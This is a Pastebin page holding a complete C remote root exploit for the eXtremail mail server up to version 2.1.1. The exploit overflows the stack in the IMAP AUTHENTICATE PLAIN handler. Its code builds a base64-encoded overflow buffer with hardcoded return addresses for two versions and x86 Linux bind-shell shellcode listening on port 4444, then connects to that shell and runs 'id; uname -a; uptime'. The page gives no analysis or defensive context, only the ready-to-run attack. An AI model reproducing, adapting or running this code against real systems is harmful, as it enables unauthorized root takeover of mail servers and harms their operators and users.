Googleinurl

eXtremail <= 2.1.1 PLAIN authentication Remote Stack Overflo

Mar 11th, 2015
487
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /* extremail-v6.c
  2. *
  3. * Copyright (c) 2006 by <mu-b@digit-labs.org>
  4. *
  5. * eXtremail <=2.1.1 remote root exploit (x86-lnx)
  6. * by mu-b - Wed Oct 18 2006
  7. *
  8. * - Tested on: eXtremail 2.1.1 (lnx)
  9. * eXtremail 2.1.0 (lnx)
  10. *
  11. * Stack overflow in ifParseAuthPlain
  12. *
  13. * - Private Source Code -DO NOT DISTRIBUTE -
  14. * http://www.digit-labs.org/ -- Digit-Labs 2006!@$!
  15. */
  16.  
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19.  
  20. #include <string.h>
  21. #include <unistd.h>
  22. #include <netinet/in.h>
  23. #include <netdb.h>
  24.  
  25. #define BUF_SIZE 2048
  26. #define BBUF_SIZE BUF_SIZE/3*4+1
  27.  
  28. #define NOP 0x41
  29.  
  30. #define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
  31.  
  32. #define DEF_PORT 143
  33. #define PORT_IMAPD DEF_PORT
  34. #define PORT_SHELL 4444
  35.  
  36. static const char movshell_lnx[] =
  37. "\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
  38. "\x40" /* inc %eax */
  39. "\xff\xe0"; /* jmp *%eax */
  40.  
  41. static const char bndshell_lnx[] =
  42. "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
  43. "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
  44. "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
  45. "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
  46. "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
  47. "\x89\xe1\xcd\x80";
  48.  
  49. #define NUM_TARGETS 2
  50.  
  51. struct target_t
  52. {
  53. const char *name;
  54. const int len;
  55. const int zshell_pos;
  56. const char *zshell;
  57. const int fp_pos;
  58. const unsigned long fp;
  59. };
  60.  
  61. /* fp = objdump -D smtpd | grep "ff e0" */
  62. struct target_t targets[] = {
  63. {"Linux eXtremail 2.1.1 (tar.gz)",
  64. 256, 1, bndshell_lnx, 140, 0x08216357}
  65. ,
  66. {"Linux eXtremail 2.1.0 (tar.gz)",
  67. 256, 1, bndshell_lnx, 140, 0x08216377}
  68. ,
  69. {0}
  70. };
  71.  
  72. static const char base64tab[] =
  73. "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  74.  
  75. static int base64 (const char *ibuf, char *obuf, size_t n);
  76. static int sock_send (int sock, char *src, int len);
  77. static int sock_recv (int sock, char *dst, int len);
  78. static int sockami (char *host, int port);
  79. static void shellami (int sock);
  80. static void zbuffami (char *zbuf, struct target_t *trgt);
  81.  
  82. static int
  83. base64 (const char *ibuf, char *obuf, size_t n)
  84. {
  85. int a, b, c;
  86. int i, j;
  87. int d, e, f, g;
  88.  
  89. a = b = c = 0;
  90. for (j = i = 0; i < n; i += 3)
  91. {
  92. a = (unsigned char) ibuf[i];
  93. b = i + 1 < n ? (unsigned char) ibuf[i + 1] : 0;
  94. c = i + 2 < n ? (unsigned char) ibuf[i + 2] : 0;
  95.  
  96. d = base64tab[a >> 2];
  97. e = base64tab[((a & 3) << 4) | (b >> 4)];
  98. f = base64tab[((b & 15) << 2) | (c >> 6)];
  99. g = base64tab[c & 63];
  100.  
  101. if (i + 1 >= n)
  102. f = '=';
  103. if (i + 2 >= n)
  104. g = '=';
  105.  
  106. obuf[j++] = d, obuf[j++] = e;
  107. obuf[j++] = f, obuf[j++] = g;
  108. }
  109.  
  110. obuf[j++] = '\n';
  111. obuf[j++] = '\0';
  112.  
  113. return strlen (obuf);
  114. }
  115.  
  116. static int
  117. sock_send (int sock, char *src, int len)
  118. {
  119. int sbytes;
  120.  
  121. sbytes = send (sock, src, len, 0);
  122.  
  123. return (sbytes);
  124. }
  125.  
  126. static int
  127. sock_recv (int sock, char *dst, int len)
  128. {
  129. int rbytes;
  130.  
  131. rbytes = recv (sock, dst, len, 0);
  132. if (rbytes >= 0)
  133. dst[rbytes] = '\0';
  134.  
  135. return (rbytes);
  136. }
  137.  
  138. static int
  139. sockami (char *host, int port)
  140. {
  141. struct sockaddr_in address;
  142. struct hostent *hp;
  143. int sock;
  144.  
  145. fflush (stdout);
  146. if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
  147. {
  148. perror ("socket()");
  149. exit (-1);
  150. }
  151.  
  152. if ((hp = gethostbyname (host)) == NULL)
  153. {
  154. perror ("gethostbyname()");
  155. exit (-1);
  156. }
  157.  
  158. memset (&address, 0, sizeof (address));
  159. memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
  160. address.sin_family = AF_INET;
  161. address.sin_port = htons (port);
  162.  
  163. if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
  164. {
  165. perror ("connect()");
  166. exit (EXIT_FAILURE);
  167. }
  168.  
  169. return (sock);
  170. }
  171.  
  172. static void
  173. shellami (int sock)
  174. {
  175. int n;
  176. fd_set rset;
  177. char recvbuf[1024], *cmd = "id; uname -a; uptime\n";
  178.  
  179. sock_send (sock, cmd, strlen (cmd));
  180.  
  181. while (1)
  182. {
  183. FD_ZERO (&rset);
  184. FD_SET (sock, &rset);
  185. FD_SET (STDIN_FILENO, &rset);
  186. select (sock + 1, &rset, NULL, NULL, NULL);
  187. if (FD_ISSET (sock, &rset))
  188. {
  189. if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0)
  190. {
  191. fprintf (stderr, "Connection closed by foreign host.\n");
  192. exit (EXIT_SUCCESS);
  193. }
  194. printf ("%s", recvbuf);
  195. }
  196. if (FD_ISSET (STDIN_FILENO, &rset))
  197. {
  198. if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0)
  199. {
  200. recvbuf[n] = '\0';
  201. sock_send (sock, recvbuf, n);
  202. }
  203. }
  204. }
  205. }
  206.  
  207. static void
  208. zbuffami (char *zbuf, struct target_t *trgt)
  209. {
  210. int i;
  211. char *fill = "digitlabs";
  212.  
  213. memset (zbuf, NOP, trgt->len);
  214. memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell));
  215.  
  216. zbuf[trgt->fp_pos + 1] = (u_char) (trgt->fp & 0x000000ff);
  217. zbuf[trgt->fp_pos + 1 + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8);
  218. zbuf[trgt->fp_pos + 1 + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16);
  219. zbuf[trgt->fp_pos + 1 + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24);
  220.  
  221. memcpy (zbuf + trgt->fp_pos + 1 + sizeof (u_long), movshell_lnx,
  222. strlen (movshell_lnx));
  223.  
  224. /* rfc #2595 states "\x00<username>\x00<password>" */
  225. zbuf[0] = '\0';
  226. zbuf[trgt->fp_pos + 1 + sizeof (u_long) + strlen (movshell_lnx)] = '\0';
  227.  
  228. for (i = trgt->fp_pos + 1 + sizeof (u_long) + strlen (movshell_lnx) + 1;
  229. i < trgt->len; i++)
  230. zbuf[i] = fill[i % strlen (fill)];
  231. }
  232.  
  233. int
  234. main (int argc, char **argv)
  235. {
  236. int sock, rbytes;
  237. char zbuf[BUF_SIZE], sbuf[BBUF_SIZE];
  238. struct target_t *trgt;
  239.  
  240. printf ("eXtremail <=2.1.1 remote root exploit\n"
  241. "by: <mu-b@digit-labs.org>\n"
  242. "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
  243.  
  244. if (argc <= 2)
  245. {
  246. fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
  247. exit (EXIT_SUCCESS);
  248. }
  249.  
  250. if (atoi (argv[2]) >= NUM_TARGETS)
  251. {
  252. fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
  253. exit (EXIT_SUCCESS);
  254. }
  255.  
  256. trgt = &targets[atoi (argv[2])];
  257. printf ("+Connecting to %s...", argv[1]);
  258. sock = sockami (argv[1], PORT_IMAPD);
  259. rbytes = sock_recv (sock, zbuf, sizeof (zbuf) - 1);
  260. if (rbytes < 0)
  261. exit (EXIT_SUCCESS);
  262. printf (" connected\n");
  263.  
  264. printf ("fp: 0x%x\n", (int) trgt->fp);
  265. printf ("buf len: %d\n", trgt->len);
  266.  
  267. printf ("+Building buffer with shellcode...");
  268. memset (zbuf, 0x00, sizeof (zbuf));
  269. zbuffami (zbuf, trgt);
  270. printf (" done\n");
  271.  
  272. printf ("+Building base64 encoded buffer...");
  273. base64 (zbuf, sbuf, trgt->len);
  274. printf (" done\n");
  275.  
  276. #ifdef DEBUG
  277. sleep (15);
  278. #endif
  279.  
  280. printf ("+Making request...");
  281. sock_send (sock, AUTH_CMD, strlen (AUTH_CMD));
  282. rbytes = sock_recv (sock, zbuf, sizeof (zbuf) - 1);
  283. if (rbytes < 0)
  284. exit (EXIT_SUCCESS);
  285.  
  286. sock_send (sock, sbuf, strlen (sbuf));
  287. printf (" done\n");
  288.  
  289. printf ("+Waiting for the shellcode to be executed...\n");
  290. sleep (1);
  291. sock = sockami (argv[1], PORT_SHELL);
  292. printf ("+Wh00t!\n\n");
  293. shellami (sock);
  294.  
  295. return (EXIT_SUCCESS);
  296. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×